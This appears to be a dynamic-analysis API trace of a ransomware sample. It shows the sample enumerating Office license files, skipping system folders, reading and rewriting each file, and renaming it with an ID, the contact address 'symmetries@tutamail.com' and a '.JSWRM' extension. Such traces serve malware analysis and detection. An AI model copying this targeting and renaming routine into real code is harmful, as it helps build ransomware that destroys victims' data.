dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0105.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0105.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription5-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription5-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.958] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=27735) returned 1 [0105.958] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6c50) returned 0x24c1d0 [0105.958] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6c50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6c50, lpOverlapped=0x0) returned 1 [0105.962] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.962] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6c50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6c50, lpOverlapped=0x0) returned 1 [0105.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.962] CloseHandle (hObject=0x45c) returned 1 [0105.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0105.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0105.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0105.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0105.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0105.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.963] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription5-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription5-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription5-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription5-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0105.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0105.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.964] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe70e34ec, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe70e34ec, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe723a976, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d97, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_Subscription5-ul-oob.xrm-ms", cAlternateFileName="O38537~1.XRM")) returned 1 [0105.964] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.964] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.964] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.964] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.964] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.964] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.964] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.964] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.964] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.964] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription5-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0105.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription5-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0105.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription5-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription5-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 45 [0105.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0105.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0105.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription5-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0105.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription5-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x22d298, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription5-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 45 [0105.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0105.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0105.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0105.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.965] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0105.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription5-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription5-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.965] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11671) returned 1 [0105.965] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d90) returned 0x24c1d0 [0105.965] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d90, lpOverlapped=0x0) returned 1 [0105.968] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.968] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d90, lpOverlapped=0x0) returned 1 [0105.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.968] CloseHandle (hObject=0x45c) returned 1 [0105.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0105.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0105.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0105.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0105.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0105.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.968] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription5-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription5-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription5-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription5-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0105.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0105.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.969] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe704ab39, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe704ab39, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe717bd96, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_SubTrial1-pl.xrm-ms", cAlternateFileName="O37450~1.XRM")) returned 1 [0105.977] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-pl.xrm-ms", lpString2=".") returned 1 [0105.977] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-pl.xrm-ms", lpString2="..") returned 1 [0105.977] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-pl.xrm-ms", lpString2="...") returned 1 [0105.977] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-pl.xrm-ms", lpString2="windows") returned -1 [0105.977] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-pl.xrm-ms", lpString2="recovery") returned -1 [0105.977] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.977] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.977] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.977] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.978] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-pl.xrm-ms", lpString2="msocache") returned 1 [0105.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0105.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial1-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial1-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial1-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0105.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0105.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial1-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial1-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d298, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial1-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0105.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0105.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0105.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0105.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial1-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial1-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.978] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11199) returned 1 [0105.979] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0105.979] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0105.981] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.981] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0105.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.981] CloseHandle (hObject=0x45c) returned 1 [0105.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0105.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0105.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0105.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0105.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0105.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0105.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.982] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial1-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial1-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial1-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial1-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0105.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0105.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0105.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.983] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7024919, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7024919, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe712f96b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5d23, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_SubTrial1-ppd.xrm-ms", cAlternateFileName="O3D84C~1.XRM")) returned 1 [0105.983] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ppd.xrm-ms", lpString2=".") returned 1 [0105.983] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ppd.xrm-ms", lpString2="..") returned 1 [0105.983] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ppd.xrm-ms", lpString2="...") returned 1 [0105.983] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ppd.xrm-ms", lpString2="windows") returned -1 [0105.983] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.983] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.983] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.983] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.983] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.983] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial1-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0105.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial1-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0105.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial1-ppd.xrm-ms", 